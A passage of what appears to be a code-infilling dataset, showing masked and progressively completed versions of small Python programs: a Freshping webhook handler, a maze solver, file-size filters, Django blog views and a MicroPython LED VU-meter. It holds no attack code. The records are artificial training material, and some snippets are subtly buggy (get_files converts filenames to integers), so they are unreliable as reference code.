"step-3": "<mask token>\nFRESHPING_TOPIC_TEMPLATE_TEST = 'Freshping'\nFRESHPING_TOPIC_TEMPLATE = '{check_name}'\nFRESHPING_MESSAGE_TEMPLATE_UNREACHABLE = (\n \"\"\"\n{request_url} has just become unreachable.\nError code: {http_status_code}.\n\"\"\"\n .strip())\nFRESHPING_MESSAGE_TEMPLATE_UP = (\n '{request_url} is back up and no longer unreachable.')\n\n\n@webhook_view('Freshping')\n@has_request_variables\ndef api_freshping_webhook(request: HttpRequest, user_profile: UserProfile,\n payload: Dict[str, Any]=REQ(argument_type='body')) ->HttpResponse:\n body = get_body_for_http_request(payload)\n subject = get_subject_for_http_request(payload)\n check_send_webhook_message(request, user_profile, subject, body)\n return json_success()\n\n\ndef get_subject_for_http_request(payload: Dict[str, Any]) ->str:\n webhook_event_data = payload['webhook_event_data']\n if webhook_event_data['application_name'] == 'Webhook test':\n subject = FRESHPING_TOPIC_TEMPLATE_TEST\n else:\n subject = FRESHPING_TOPIC_TEMPLATE.format(check_name=\n webhook_event_data['check_name'])\n return subject\n\n\ndef get_body_for_http_request(payload: Dict[str, Any]) ->str:\n webhook_event_data = payload['webhook_event_data']\n if webhook_event_data['check_state_name'] == 'Reporting Error':\n body = FRESHPING_MESSAGE_TEMPLATE_UNREACHABLE.format(**\n webhook_event_data)\n elif webhook_event_data['check_state_name'] == 'Available':\n if webhook_event_data['application_name'] == 'Webhook test':\n body = get_setup_webhook_message('Freshping')\n else:\n body = FRESHPING_MESSAGE_TEMPLATE_UP.format(**webhook_event_data)\n return body\n",
"step-4": "from typing import Any, Dict\nfrom django.http import HttpRequest, HttpResponse\nfrom zerver.decorator import REQ, has_request_variables, webhook_view\nfrom zerver.lib.response import json_success\nfrom zerver.lib.webhooks.common import check_send_webhook_message, get_setup_webhook_message\nfrom zerver.models import UserProfile\nFRESHPING_TOPIC_TEMPLATE_TEST = 'Freshping'\nFRESHPING_TOPIC_TEMPLATE = '{check_name}'\nFRESHPING_MESSAGE_TEMPLATE_UNREACHABLE = (\n \"\"\"\n{request_url} has just become unreachable.\nError code: {http_status_code}.\n\"\"\"\n .strip())\nFRESHPING_MESSAGE_TEMPLATE_UP = (\n '{request_url} is back up and no longer unreachable.')\n\n\n@webhook_view('Freshping')\n@has_request_variables\ndef api_freshping_webhook(request: HttpRequest, user_profile: UserProfile,\n payload: Dict[str, Any]=REQ(argument_type='body')) ->HttpResponse:\n body = get_body_for_http_request(payload)\n subject = get_subject_for_http_request(payload)\n check_send_webhook_message(request, user_profile, subject, body)\n return json_success()\n\n\ndef get_subject_for_http_request(payload: Dict[str, Any]) ->str:\n webhook_event_data = payload['webhook_event_data']\n if webhook_event_data['application_name'] == 'Webhook test':\n subject = FRESHPING_TOPIC_TEMPLATE_TEST\n else:\n subject = FRESHPING_TOPIC_TEMPLATE.format(check_name=\n webhook_event_data['check_name'])\n return subject\n\n\ndef get_body_for_http_request(payload: Dict[str, Any]) ->str:\n webhook_event_data = payload['webhook_event_data']\n if webhook_event_data['check_state_name'] == 'Reporting Error':\n body = FRESHPING_MESSAGE_TEMPLATE_UNREACHABLE.format(**\n webhook_event_data)\n elif webhook_event_data['check_state_name'] == 'Available':\n if webhook_event_data['application_name'] == 'Webhook test':\n body = get_setup_webhook_message('Freshping')\n else:\n body = FRESHPING_MESSAGE_TEMPLATE_UP.format(**webhook_event_data)\n return body\n",
"step-5": "from typing import Any, Dict\n\nfrom django.http import HttpRequest, HttpResponse\n\nfrom zerver.decorator import REQ, has_request_variables, webhook_view\nfrom zerver.lib.response import json_success\nfrom zerver.lib.webhooks.common import check_send_webhook_message, get_setup_webhook_message\nfrom zerver.models import UserProfile\n\nFRESHPING_TOPIC_TEMPLATE_TEST = \"Freshping\"\nFRESHPING_TOPIC_TEMPLATE = \"{check_name}\"\n\nFRESHPING_MESSAGE_TEMPLATE_UNREACHABLE = \"\"\"\n{request_url} has just become unreachable.\nError code: {http_status_code}.\n\"\"\".strip()\nFRESHPING_MESSAGE_TEMPLATE_UP = \"{request_url} is back up and no longer unreachable.\"\n\n\n@webhook_view(\"Freshping\")\n@has_request_variables\ndef api_freshping_webhook(\n request: HttpRequest,\n user_profile: UserProfile,\n payload: Dict[str, Any] = REQ(argument_type=\"body\"),\n) -> HttpResponse:\n\n body = get_body_for_http_request(payload)\n subject = get_subject_for_http_request(payload)\n\n check_send_webhook_message(request, user_profile, subject, body)\n return json_success()\n\n\ndef get_subject_for_http_request(payload: Dict[str, Any]) -> str:\n webhook_event_data = payload[\"webhook_event_data\"]\n if webhook_event_data[\"application_name\"] == \"Webhook test\":\n subject = FRESHPING_TOPIC_TEMPLATE_TEST\n else:\n subject = FRESHPING_TOPIC_TEMPLATE.format(check_name=webhook_event_data[\"check_name\"])\n\n return subject\n\n\ndef get_body_for_http_request(payload: Dict[str, Any]) -> str:\n webhook_event_data = payload[\"webhook_event_data\"]\n if webhook_event_data[\"check_state_name\"] == \"Reporting Error\":\n body = FRESHPING_MESSAGE_TEMPLATE_UNREACHABLE.format(**webhook_event_data)\n elif webhook_event_data[\"check_state_name\"] == \"Available\":\n if webhook_event_data[\"application_name\"] == \"Webhook test\":\n body = get_setup_webhook_message(\"Freshping\")\n else:\n body = FRESHPING_MESSAGE_TEMPLATE_UP.format(**webhook_event_data)\n\n return body\n",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
pairs = ['usdt', 'btc']
warn_msg = '** WARN ** '
info_msg = '** INFO **'
|
normal
|
{
"blob_id": "26289d88ac51ee359faa81ca70b01879d2b1f840",
"index": 9460,
"step-1": "<mask token>\n",
"step-2": "pairs = ['usdt', 'btc']\nwarn_msg = '** WARN ** '\ninfo_msg = '** INFO **'\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
# -*- coding: utf-8 -*-
def create_map(rows):
maze = []
for row in rows:
row = row[:-1]
subarr = []
for i in row:
subarr.append(i)
maze.append(subarr)
return maze
def print_map(chart):
for subarr in chart:
print(subarr)
def find_start(chart):
for y in range(len(chart)):
row = chart[y]
for x in range(len(row)):
if row[x] == 'S':
return (y, x)
def find_exit(y, x, chart, path):
h = len(chart)
w = len(chart[0])
# left
if x-1 == 0 and chart[y][x-1] == ' ':
chart[y][x-1] = 'E'
path[(y, x-1)] = [y, x]
return
elif x-1 > 0 and chart[y][x-1] == ' ':
chart[y][x-1] = '0'
path[(y, x - 1)] = [y, x]
find_exit(y, x-1, chart, path)
# up
if y-1 == 0 and chart[y-1][x] == ' ':
chart[y-1][x] = 'E'
path[(y-1, x)] = [y, x]
return
elif y-1 > 0 and chart[y-1][x] == ' ':
chart[y-1][x] = '0'
path[(y - 1, x)] = [y, x]
find_exit(y-1, x, chart, path)
# right
if x+1 == w-1 and chart[y][x+1] == ' ':
chart[y][x+1] = 'E'
path[(y, x+1)] = [y, x]
return
elif x+1 < w - 1 and chart[y][x+1] == ' ':
chart[y][x+1] = '0'
path[(y, x + 1)] = [y, x]
find_exit(y, x+1, chart, path)
# down
if y+1 == h-1 and chart[y+1][x] == ' ':
chart[y+1][x] = 'E'
path[(y+1, x)] = [y, x]
return
elif y+1 < h - 1 and chart[y+1][x] == ' ':
chart[y+1][x] = '0'
path[(y + 1, x)] = [y, x]
find_exit(y+1, x, chart, path)
def check_exit(chart):
height = len(chart)
width = len(chart[0])
for x in range(width):
v = chart[0][x]
if v == 'E':
return True, 0, x
v = chart[height-1][x]
if v == 'E':
return True, height-1, x
for y in range(height):
v = chart[y][0]
if v == 'E':
return True, y, 0
v = chart[y][width-1]
if v == 'E':
return True, y, width-1
return False, -1, -1
if __name__ == '__main__':
file = open('../00_text_files/01_labyrinth.txt', 'rt')
labyrinth = file.readlines()
file.close()
maze = create_map(labyrinth)
start = find_start(maze)
maze[start[0]][start[1]] = '0'
path = {}
find_exit(start[0], start[1], maze, path)
print_map(maze)
ex = check_exit(maze)
if ex[0]:
y = ex[1]
x = ex[2]
print([y, x, maze[y][x]])
while True:
coord = (y, x)
if coord in path:
y, x = path[coord]
print([y, x, maze[y][x]])
else:
break
else:
print("NO WAY")
|
normal
|
{
"blob_id": "bde37f3b41c810ab465de5e0ae374703af9f01f3",
"index": 9033,
"step-1": "def create_map(rows):\n maze = []\n for row in rows:\n row = row[:-1]\n subarr = []\n for i in row:\n subarr.append(i)\n maze.append(subarr)\n return maze\n\n\ndef print_map(chart):\n for subarr in chart:\n print(subarr)\n\n\ndef find_start(chart):\n for y in range(len(chart)):\n row = chart[y]\n for x in range(len(row)):\n if row[x] == 'S':\n return y, x\n\n\n<mask token>\n",
"step-2": "def create_map(rows):\n maze = []\n for row in rows:\n row = row[:-1]\n subarr = []\n for i in row:\n subarr.append(i)\n maze.append(subarr)\n return maze\n\n\ndef print_map(chart):\n for subarr in chart:\n print(subarr)\n\n\ndef find_start(chart):\n for y in range(len(chart)):\n row = chart[y]\n for x in range(len(row)):\n if row[x] == 'S':\n return y, x\n\n\ndef find_exit(y, x, chart, path):\n h = len(chart)\n w = len(chart[0])\n if x - 1 == 0 and chart[y][x - 1] == ' ':\n chart[y][x - 1] = 'E'\n path[y, x - 1] = [y, x]\n return\n elif x - 1 > 0 and chart[y][x - 1] == ' ':\n chart[y][x - 1] = '0'\n path[y, x - 1] = [y, x]\n find_exit(y, x - 1, chart, path)\n if y - 1 == 0 and chart[y - 1][x] == ' ':\n chart[y - 1][x] = 'E'\n path[y - 1, x] = [y, x]\n return\n elif y - 1 > 0 and chart[y - 1][x] == ' ':\n chart[y - 1][x] = '0'\n path[y - 1, x] = [y, x]\n find_exit(y - 1, x, chart, path)\n if x + 1 == w - 1 and chart[y][x + 1] == ' ':\n chart[y][x + 1] = 'E'\n path[y, x + 1] = [y, x]\n return\n elif x + 1 < w - 1 and chart[y][x + 1] == ' ':\n chart[y][x + 1] = '0'\n path[y, x + 1] = [y, x]\n find_exit(y, x + 1, chart, path)\n if y + 1 == h - 1 and chart[y + 1][x] == ' ':\n chart[y + 1][x] = 'E'\n path[y + 1, x] = [y, x]\n return\n elif y + 1 < h - 1 and chart[y + 1][x] == ' ':\n chart[y + 1][x] = '0'\n path[y + 1, x] = [y, x]\n find_exit(y + 1, x, chart, path)\n\n\n<mask token>\n",
"step-3": "def create_map(rows):\n maze = []\n for row in rows:\n row = row[:-1]\n subarr = []\n for i in row:\n subarr.append(i)\n maze.append(subarr)\n return maze\n\n\ndef print_map(chart):\n for subarr in chart:\n print(subarr)\n\n\ndef find_start(chart):\n for y in range(len(chart)):\n row = chart[y]\n for x in range(len(row)):\n if row[x] == 'S':\n return y, x\n\n\ndef find_exit(y, x, chart, path):\n h = len(chart)\n w = len(chart[0])\n if x - 1 == 0 and chart[y][x - 1] == ' ':\n chart[y][x - 1] = 'E'\n path[y, x - 1] = [y, x]\n return\n elif x - 1 > 0 and chart[y][x - 1] == ' ':\n chart[y][x - 1] = '0'\n path[y, x - 1] = [y, x]\n find_exit(y, x - 1, chart, path)\n if y - 1 == 0 and chart[y - 1][x] == ' ':\n chart[y - 1][x] = 'E'\n path[y - 1, x] = [y, x]\n return\n elif y - 1 > 0 and chart[y - 1][x] == ' ':\n chart[y - 1][x] = '0'\n path[y - 1, x] = [y, x]\n find_exit(y - 1, x, chart, path)\n if x + 1 == w - 1 and chart[y][x + 1] == ' ':\n chart[y][x + 1] = 'E'\n path[y, x + 1] = [y, x]\n return\n elif x + 1 < w - 1 and chart[y][x + 1] == ' ':\n chart[y][x + 1] = '0'\n path[y, x + 1] = [y, x]\n find_exit(y, x + 1, chart, path)\n if y + 1 == h - 1 and chart[y + 1][x] == ' ':\n chart[y + 1][x] = 'E'\n path[y + 1, x] = [y, x]\n return\n elif y + 1 < h - 1 and chart[y + 1][x] == ' ':\n chart[y + 1][x] = '0'\n path[y + 1, x] = [y, x]\n find_exit(y + 1, x, chart, path)\n\n\ndef check_exit(chart):\n height = len(chart)\n width = len(chart[0])\n for x in range(width):\n v = chart[0][x]\n if v == 'E':\n return True, 0, x\n v = chart[height - 1][x]\n if v == 'E':\n return True, height - 1, x\n for y in range(height):\n v = chart[y][0]\n if v == 'E':\n return True, y, 0\n v = chart[y][width - 1]\n if v == 'E':\n return True, y, width - 1\n return False, -1, -1\n\n\n<mask token>\n",
"step-4": "def create_map(rows):\n maze = []\n for row in rows:\n row = row[:-1]\n subarr = []\n for i in row:\n subarr.append(i)\n maze.append(subarr)\n return maze\n\n\ndef print_map(chart):\n for subarr in chart:\n print(subarr)\n\n\ndef find_start(chart):\n for y in range(len(chart)):\n row = chart[y]\n for x in range(len(row)):\n if row[x] == 'S':\n return y, x\n\n\ndef find_exit(y, x, chart, path):\n h = len(chart)\n w = len(chart[0])\n if x - 1 == 0 and chart[y][x - 1] == ' ':\n chart[y][x - 1] = 'E'\n path[y, x - 1] = [y, x]\n return\n elif x - 1 > 0 and chart[y][x - 1] == ' ':\n chart[y][x - 1] = '0'\n path[y, x - 1] = [y, x]\n find_exit(y, x - 1, chart, path)\n if y - 1 == 0 and chart[y - 1][x] == ' ':\n chart[y - 1][x] = 'E'\n path[y - 1, x] = [y, x]\n return\n elif y - 1 > 0 and chart[y - 1][x] == ' ':\n chart[y - 1][x] = '0'\n path[y - 1, x] = [y, x]\n find_exit(y - 1, x, chart, path)\n if x + 1 == w - 1 and chart[y][x + 1] == ' ':\n chart[y][x + 1] = 'E'\n path[y, x + 1] = [y, x]\n return\n elif x + 1 < w - 1 and chart[y][x + 1] == ' ':\n chart[y][x + 1] = '0'\n path[y, x + 1] = [y, x]\n find_exit(y, x + 1, chart, path)\n if y + 1 == h - 1 and chart[y + 1][x] == ' ':\n chart[y + 1][x] = 'E'\n path[y + 1, x] = [y, x]\n return\n elif y + 1 < h - 1 and chart[y + 1][x] == ' ':\n chart[y + 1][x] = '0'\n path[y + 1, x] = [y, x]\n find_exit(y + 1, x, chart, path)\n\n\ndef check_exit(chart):\n height = len(chart)\n width = len(chart[0])\n for x in range(width):\n v = chart[0][x]\n if v == 'E':\n return True, 0, x\n v = chart[height - 1][x]\n if v == 'E':\n return True, height - 1, x\n for y in range(height):\n v = chart[y][0]\n if v == 'E':\n return True, y, 0\n v = chart[y][width - 1]\n if v == 'E':\n return True, y, width - 1\n return False, -1, -1\n\n\nif __name__ == '__main__':\n file = open('../00_text_files/01_labyrinth.txt', 'rt')\n labyrinth = file.readlines()\n file.close()\n maze = create_map(labyrinth)\n start = find_start(maze)\n maze[start[0]][start[1]] = '0'\n path = {}\n find_exit(start[0], start[1], maze, path)\n print_map(maze)\n ex = check_exit(maze)\n if ex[0]:\n y = ex[1]\n x = ex[2]\n print([y, x, maze[y][x]])\n while True:\n coord = y, x\n if coord in path:\n y, x = path[coord]\n print([y, x, maze[y][x]])\n else:\n break\n else:\n print('NO WAY')\n",
"step-5": "# -*- coding: utf-8 -*-\n\n\ndef create_map(rows):\n maze = []\n for row in rows:\n row = row[:-1]\n subarr = []\n for i in row:\n subarr.append(i)\n maze.append(subarr)\n return maze\n\n\ndef print_map(chart):\n for subarr in chart:\n print(subarr)\n\n\ndef find_start(chart):\n for y in range(len(chart)):\n row = chart[y]\n for x in range(len(row)):\n if row[x] == 'S':\n return (y, x)\n\n\ndef find_exit(y, x, chart, path):\n h = len(chart)\n w = len(chart[0])\n # left\n if x-1 == 0 and chart[y][x-1] == ' ':\n chart[y][x-1] = 'E'\n path[(y, x-1)] = [y, x]\n return\n elif x-1 > 0 and chart[y][x-1] == ' ':\n chart[y][x-1] = '0'\n path[(y, x - 1)] = [y, x]\n find_exit(y, x-1, chart, path)\n # up\n if y-1 == 0 and chart[y-1][x] == ' ':\n chart[y-1][x] = 'E'\n path[(y-1, x)] = [y, x]\n return\n elif y-1 > 0 and chart[y-1][x] == ' ':\n chart[y-1][x] = '0'\n path[(y - 1, x)] = [y, x]\n find_exit(y-1, x, chart, path)\n # right\n if x+1 == w-1 and chart[y][x+1] == ' ':\n chart[y][x+1] = 'E'\n path[(y, x+1)] = [y, x]\n return\n elif x+1 < w - 1 and chart[y][x+1] == ' ':\n chart[y][x+1] = '0'\n path[(y, x + 1)] = [y, x]\n find_exit(y, x+1, chart, path)\n # down\n if y+1 == h-1 and chart[y+1][x] == ' ':\n chart[y+1][x] = 'E'\n path[(y+1, x)] = [y, x]\n return\n elif y+1 < h - 1 and chart[y+1][x] == ' ':\n chart[y+1][x] = '0'\n path[(y + 1, x)] = [y, x]\n find_exit(y+1, x, chart, path)\n\n\ndef check_exit(chart):\n height = len(chart)\n width = len(chart[0])\n\n for x in range(width):\n v = chart[0][x]\n if v == 'E':\n return True, 0, x\n v = chart[height-1][x]\n if v == 'E':\n return True, height-1, x\n\n for y in range(height):\n v = chart[y][0]\n if v == 'E':\n return True, y, 0\n v = chart[y][width-1]\n if v == 'E':\n return True, y, width-1\n\n return False, -1, -1\n\n\nif __name__ == '__main__':\n file = open('../00_text_files/01_labyrinth.txt', 'rt')\n labyrinth = file.readlines()\n file.close()\n maze = create_map(labyrinth)\n start = find_start(maze)\n maze[start[0]][start[1]] = '0'\n path = {}\n find_exit(start[0], start[1], maze, path)\n print_map(maze)\n\n ex = check_exit(maze)\n if ex[0]:\n y = ex[1]\n x = ex[2]\n print([y, x, maze[y][x]])\n while True:\n coord = (y, x)\n if coord in path:\n y, x = path[coord]\n print([y, x, maze[y][x]])\n else:\n break\n else:\n print(\"NO WAY\")\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
import os
import glob
ONE_KB = 1024
def get_files(dirname, size_in_kb):
"""Return files in dirname that are >= size_in_kb"""
return (
filename
for _, _, files in os.walk(dirname)
for filename in files
if int(filename) >= size_in_kb * ONE_KB
)
# Pybites solution
def get_files1(dirname, size_in_kb):
"""Return files in dirname that are >= size_in_kb"""
for file in glob.glob(os.path.join(dirname, "*")):
if os.stat(file).st_size >= size_in_kb * ONE_KB:
yield file
|
normal
|
{
"blob_id": "0dec0f04cfe891eea74ef45484fa7433e3429dcd",
"index": 7570,
"step-1": "<mask token>\n\n\ndef get_files1(dirname, size_in_kb):\n \"\"\"Return files in dirname that are >= size_in_kb\"\"\"\n for file in glob.glob(os.path.join(dirname, '*')):\n if os.stat(file).st_size >= size_in_kb * ONE_KB:\n yield file\n",
"step-2": "<mask token>\n\n\ndef get_files(dirname, size_in_kb):\n \"\"\"Return files in dirname that are >= size_in_kb\"\"\"\n return (filename for _, _, files in os.walk(dirname) for filename in\n files if int(filename) >= size_in_kb * ONE_KB)\n\n\ndef get_files1(dirname, size_in_kb):\n \"\"\"Return files in dirname that are >= size_in_kb\"\"\"\n for file in glob.glob(os.path.join(dirname, '*')):\n if os.stat(file).st_size >= size_in_kb * ONE_KB:\n yield file\n",
"step-3": "<mask token>\nONE_KB = 1024\n\n\ndef get_files(dirname, size_in_kb):\n \"\"\"Return files in dirname that are >= size_in_kb\"\"\"\n return (filename for _, _, files in os.walk(dirname) for filename in\n files if int(filename) >= size_in_kb * ONE_KB)\n\n\ndef get_files1(dirname, size_in_kb):\n \"\"\"Return files in dirname that are >= size_in_kb\"\"\"\n for file in glob.glob(os.path.join(dirname, '*')):\n if os.stat(file).st_size >= size_in_kb * ONE_KB:\n yield file\n",
"step-4": "import os\nimport glob\nONE_KB = 1024\n\n\ndef get_files(dirname, size_in_kb):\n \"\"\"Return files in dirname that are >= size_in_kb\"\"\"\n return (filename for _, _, files in os.walk(dirname) for filename in\n files if int(filename) >= size_in_kb * ONE_KB)\n\n\ndef get_files1(dirname, size_in_kb):\n \"\"\"Return files in dirname that are >= size_in_kb\"\"\"\n for file in glob.glob(os.path.join(dirname, '*')):\n if os.stat(file).st_size >= size_in_kb * ONE_KB:\n yield file\n",
"step-5": "import os\nimport glob\n\nONE_KB = 1024\n\n\ndef get_files(dirname, size_in_kb):\n \"\"\"Return files in dirname that are >= size_in_kb\"\"\"\n return (\n filename\n for _, _, files in os.walk(dirname)\n for filename in files\n if int(filename) >= size_in_kb * ONE_KB\n )\n\n\n# Pybites solution\ndef get_files1(dirname, size_in_kb):\n \"\"\"Return files in dirname that are >= size_in_kb\"\"\"\n for file in glob.glob(os.path.join(dirname, \"*\")):\n if os.stat(file).st_size >= size_in_kb * ONE_KB:\n yield file\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
from django.shortcuts import render,get_object_or_404, redirect
from django.contrib import admin #어드민 쓸꺼면 써야됨
from .models import Blog #앱을 가지고 오겠다는거
from django.utils import timezone
admin.site.register(Blog) #블로그 형식을 가져와 등록하겠다.
# Create your views here.
def home(request):
blogs = Blog.objects
return render(request,'home.html',{'blogs':blogs})
def detail(request,blog_id):
blog_detail= get_object_or_404(Blog,pk=blog_id)
return render(request,'detail.html',{'blog': blog_detail})
def new(request):
return render(request,'new.html')
def create(request):
blog=Blog()
blog.title=request.GET['title']
blog.body=request.GET['body']
blog.pub_date=timezone.datetime.now()
blog.save()
return redirect('/blog/'+str(blog.id))
|
normal
|
{
"blob_id": "bc25338612f525f616fb26c64d8b36667d297d40",
"index": 3921,
"step-1": "<mask token>\n\n\ndef home(request):\n blogs = Blog.objects\n return render(request, 'home.html', {'blogs': blogs})\n\n\ndef detail(request, blog_id):\n blog_detail = get_object_or_404(Blog, pk=blog_id)\n return render(request, 'detail.html', {'blog': blog_detail})\n\n\n<mask token>\n\n\ndef create(request):\n blog = Blog()\n blog.title = request.GET['title']\n blog.body = request.GET['body']\n blog.pub_date = timezone.datetime.now()\n blog.save()\n return redirect('/blog/' + str(blog.id))\n",
"step-2": "<mask token>\n\n\ndef home(request):\n blogs = Blog.objects\n return render(request, 'home.html', {'blogs': blogs})\n\n\ndef detail(request, blog_id):\n blog_detail = get_object_or_404(Blog, pk=blog_id)\n return render(request, 'detail.html', {'blog': blog_detail})\n\n\ndef new(request):\n return render(request, 'new.html')\n\n\ndef create(request):\n blog = Blog()\n blog.title = request.GET['title']\n blog.body = request.GET['body']\n blog.pub_date = timezone.datetime.now()\n blog.save()\n return redirect('/blog/' + str(blog.id))\n",
"step-3": "<mask token>\nadmin.site.register(Blog)\n\n\ndef home(request):\n blogs = Blog.objects\n return render(request, 'home.html', {'blogs': blogs})\n\n\ndef detail(request, blog_id):\n blog_detail = get_object_or_404(Blog, pk=blog_id)\n return render(request, 'detail.html', {'blog': blog_detail})\n\n\ndef new(request):\n return render(request, 'new.html')\n\n\ndef create(request):\n blog = Blog()\n blog.title = request.GET['title']\n blog.body = request.GET['body']\n blog.pub_date = timezone.datetime.now()\n blog.save()\n return redirect('/blog/' + str(blog.id))\n",
"step-4": "from django.shortcuts import render, get_object_or_404, redirect\nfrom django.contrib import admin\nfrom .models import Blog\nfrom django.utils import timezone\nadmin.site.register(Blog)\n\n\ndef home(request):\n blogs = Blog.objects\n return render(request, 'home.html', {'blogs': blogs})\n\n\ndef detail(request, blog_id):\n blog_detail = get_object_or_404(Blog, pk=blog_id)\n return render(request, 'detail.html', {'blog': blog_detail})\n\n\ndef new(request):\n return render(request, 'new.html')\n\n\ndef create(request):\n blog = Blog()\n blog.title = request.GET['title']\n blog.body = request.GET['body']\n blog.pub_date = timezone.datetime.now()\n blog.save()\n return redirect('/blog/' + str(blog.id))\n",
"step-5": "from django.shortcuts import render,get_object_or_404, redirect\nfrom django.contrib import admin #어드민 쓸꺼면 써야됨\nfrom .models import Blog #앱을 가지고 오겠다는거\nfrom django.utils import timezone\n\nadmin.site.register(Blog) #블로그 형식을 가져와 등록하겠다.\n# Create your views here.\ndef home(request):\n blogs = Blog.objects\n return render(request,'home.html',{'blogs':blogs})\n\ndef detail(request,blog_id):\n blog_detail= get_object_or_404(Blog,pk=blog_id)\n return render(request,'detail.html',{'blog': blog_detail})\n\ndef new(request):\n return render(request,'new.html')\n\ndef create(request):\n blog=Blog()\n blog.title=request.GET['title']\n blog.body=request.GET['body']\n blog.pub_date=timezone.datetime.now()\n blog.save()\n return redirect('/blog/'+str(blog.id))",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
# Global version information
__version__ = "0.6.1"
|
normal
|
{
"blob_id": "8aeb7786984f27fabdcaffa54f52eb868c277fdb",
"index": 7707,
"step-1": "<mask token>\n",
"step-2": "__version__ = '0.6.1'\n",
"step-3": "# Global version information\n__version__ = \"0.6.1\"\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
#Copyright [2017] [Mauro Riva <lemariva@mail.com> <lemariva.com>]
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#http://www.apache.org/licenses/LICENSE-2.0
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
#The above copyright notice and this permission notice shall be
#included in all copies or substantial portions of the Software.
import math as m
import utime
from machine import ADC
from ws2812 import WS2812
class vu_meter:
ledsColors = []
def __init__(self, ledNumber=144, ledPower = 100, adcWindow = 1500, adcMax = 100, adcPin = 'P13', pinLEDs = 'P22'):
self.ledPower = ledPower
self.ledNumber = ledNumber
self.pinLeds = pinLEDs
self.adcPin = adcPin
self.adcWindow = adcWindow
self.ledsColors = []
self.adcIn = 0.0
self.adcMax = adcMax
self.adcMaxDynamic = False
# inizialize ADC
self.init_adc()
self.init_leds()
def init_adc(self):
self.adc = ADC(0)
self.adcUnit = self.adc.channel(pin=self.adcPin)
self.adcMean = 0
def init_leds(self):
self.ledsColors = []
for x in range(0, self.ledNumber):
color = self.color_vu_meter (x)
self.ledsColors.append(color)
self.ledChain = WS2812( ledNumber=self.ledNumber, brightness=self.ledPower, dataPin=self.pinLeds ) # dataPin is for LoPy board only
self.ledChain.show( self.ledsColors )
def test_leds(self):
testData = self.ledsColors
for x in range(0, self.ledNumber):
testData = testData[1:] + testData[0:1]
self.ledChain.show( testData )
self.ledChain.show([])
def lighter(self, color, percent):
percent = percent / 100
if(percent == 1):
return color
if(percent == 0):
return ([0, 0, 0])
#if(percent < 0.65): # driver not working ok with percent under 0.65
# percent = 0.65
rcolor = color[0] - color[0] * (1-percent)
gcolor = color[1] - color[1] * (1-percent)
bcolor = color[2] - color[2] * (1-percent)
newcolor = ([(rcolor), (gcolor), (bcolor)])
return newcolor
def color_vu_meter(self, position):
rcolor = (255 * position) / self.ledNumber
gcolor = (255 * (self.ledNumber - position)) / self.ledNumber
bcolor= 0
newcolor = self.lighter([(rcolor), (gcolor), (bcolor)], self.ledPower)
return newcolor
def adc_max_dynamic(self, state = True, adcMax = 100):
self.adcMaxDynamic = state
self.adcMax = adcMax
return self.adcMaxDynamic
def adc_max(self):
return self.adcMax
def zero_calibration(self):
self.adcMean = 0
for y in range(0, self.adcWindow):
self.adcMean = self.adcMean + self.adcUnit.value()
self.adcMean = self.adcMean / self.adcWindow
return self.adcMean
def update_rms(self):
t1 = utime.ticks_ms()
power = 0
self.audioPower = 0
for x in range(0, self.adcWindow):
adc_value = self.adcUnit.value() - self.adcMean
power = power + m.pow(adc_value, 2)
power = (m.sqrt(power / self.adcWindow))
self.audioPower = power
t2 = utime.ticks_ms()
time_elapsed = t2 - t1
if(self.adcMaxDynamic):
if(self.adcMax < power):
self.adcMax = power
self.normalizedPower = power / self.adcMax
#20 * log10(sqrt(sum / count))
if(self.normalizedPower > 1):
self.normalizedPower = 1
return [time_elapsed, power]
def update_leds(self):
leds_count = m.floor(self.normalizedPower * self.ledNumber)
self.ledChain.show( self.ledsColors[1:leds_count] )
|
normal
|
{
"blob_id": "894d8d00fd05bf8648f1b95ecf30b70e7b4e841b",
"index": 8640,
"step-1": "<mask token>\n\n\nclass vu_meter:\n <mask token>\n <mask token>\n\n def init_adc(self):\n self.adc = ADC(0)\n self.adcUnit = self.adc.channel(pin=self.adcPin)\n self.adcMean = 0\n\n def init_leds(self):\n self.ledsColors = []\n for x in range(0, self.ledNumber):\n color = self.color_vu_meter(x)\n self.ledsColors.append(color)\n self.ledChain = WS2812(ledNumber=self.ledNumber, brightness=self.\n ledPower, dataPin=self.pinLeds)\n self.ledChain.show(self.ledsColors)\n <mask token>\n\n def lighter(self, color, percent):\n percent = percent / 100\n if percent == 1:\n return color\n if percent == 0:\n return [0, 0, 0]\n rcolor = color[0] - color[0] * (1 - percent)\n gcolor = color[1] - color[1] * (1 - percent)\n bcolor = color[2] - color[2] * (1 - percent)\n newcolor = [rcolor, gcolor, bcolor]\n return newcolor\n <mask token>\n <mask token>\n <mask token>\n\n def zero_calibration(self):\n self.adcMean = 0\n for y in range(0, self.adcWindow):\n self.adcMean = self.adcMean + self.adcUnit.value()\n self.adcMean = self.adcMean / self.adcWindow\n return self.adcMean\n\n def update_rms(self):\n t1 = utime.ticks_ms()\n power = 0\n self.audioPower = 0\n for x in range(0, self.adcWindow):\n adc_value = self.adcUnit.value() - self.adcMean\n power = power + m.pow(adc_value, 2)\n power = m.sqrt(power / self.adcWindow)\n self.audioPower = power\n t2 = utime.ticks_ms()\n time_elapsed = t2 - t1\n if self.adcMaxDynamic:\n if self.adcMax < power:\n self.adcMax = power\n self.normalizedPower = power / self.adcMax\n if self.normalizedPower > 1:\n self.normalizedPower = 1\n return [time_elapsed, power]\n\n def update_leds(self):\n leds_count = m.floor(self.normalizedPower * self.ledNumber)\n self.ledChain.show(self.ledsColors[1:leds_count])\n",
